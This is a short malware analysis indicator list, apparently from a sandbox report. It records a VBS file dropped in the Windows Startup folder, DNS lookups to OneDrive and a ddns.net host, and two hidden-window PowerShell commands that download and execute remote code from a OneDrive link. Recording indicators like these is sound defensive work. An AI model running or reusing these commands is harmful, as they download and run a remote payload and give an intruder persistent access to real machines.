Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\ dddd.vbs
- 'on####ve.live.com':443
- 'pq####.#n.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK pq####.#n.files.1drv.com
- DNS ASK si##.ddns.net
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://onedrive.live.com/download?cid=DA6A72486E7AA10D&resid=DA6A72486E7AA10D%21111&authkey=AGfLS_WmFWbh8Bg')' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://onedrive.live.com/download?cid=DA6A72486E7AA10D&resid=DA6A72486E7AA10D%21111&authkey=AGfLS_WmFWbh8Bg')